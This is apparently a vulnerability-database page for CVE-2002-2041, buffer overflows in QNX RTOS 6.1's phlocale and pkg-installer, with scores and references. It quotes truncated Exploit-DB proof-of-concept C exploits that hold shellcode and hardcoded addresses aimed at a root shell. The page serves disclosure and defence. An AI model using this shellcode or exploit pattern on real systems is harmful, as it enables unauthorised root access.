CVE-2002-2041
published 2002-12-31CVE-2002-2041: Multiple buffer overflows in realtime operating system (RTOS) 6.1.0 allows local users to execute arbitrary code via (1) a long ABLANG environment variable in…
PriorityP422high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.24%
65.3th percentile
Multiple buffer overflows in realtime operating system (RTOS) 6.1.0 allows local users to execute arbitrary code via (1) a long ABLANG environment variable in phlocale or (2) a long -u option to pkg-installer.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qnx | rtos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow
exploitdb·2002-06-03
CVE-2002-2041 QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow
QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/4917/info
The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root.
*/
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
* If it doesnt work for you, then you most likely need to change
* the address to system() and/or the ret.
*
* www.badc0ded.com
*/
main ()
{
char s[]="\xeb\x0e\x31\xc0\x5b"
"\x88\x43\x2\x53\xbb"
"\x80\x95\x04\x08" //system() address
"\xff\xd3\xe8\xed\xff"
"\xff\xff\x73\x68";
char payload[1000];
memset (payload,0x90,sizeof(pay
Exploit-DB
QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow
exploitdb·2002-06-03
CVE-2002-2041 QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow
QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/4918/info
It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.
The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer.
*/
/* Quick and dirty QNX pkg-installer root exploit.
* The shellcode sucks, it is longer than it has
* to be and you need the address to system() for
* it to work. Yes I know I'm lazy....
*
* http://www.badc0ded.com
*/
main(int argc, char **argv)
{
int ret=0x804786d;
char *pret;
char s[]="\xeb\x0e\x31\xc0\x5b"
"\x88\x43\x2\x53\xbb"
"\xe4\xb4\x04\x08" //system() address
"\xff\xd3\xe8\xed\xff"
"\xff\xff\x73\x68";
char payload[2000];
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/275218http://www.iss.net/security_center/static/9258.phphttp://www.iss.net/security_center/static/9259.phphttp://www.securityfocus.com/bid/4917http://www.securityfocus.com/bid/4918http://online.securityfocus.com/archive/1/275218http://www.iss.net/security_center/static/9258.phphttp://www.iss.net/security_center/static/9259.phphttp://www.securityfocus.com/bid/4917http://www.securityfocus.com/bid/4918
2002-12-31
Published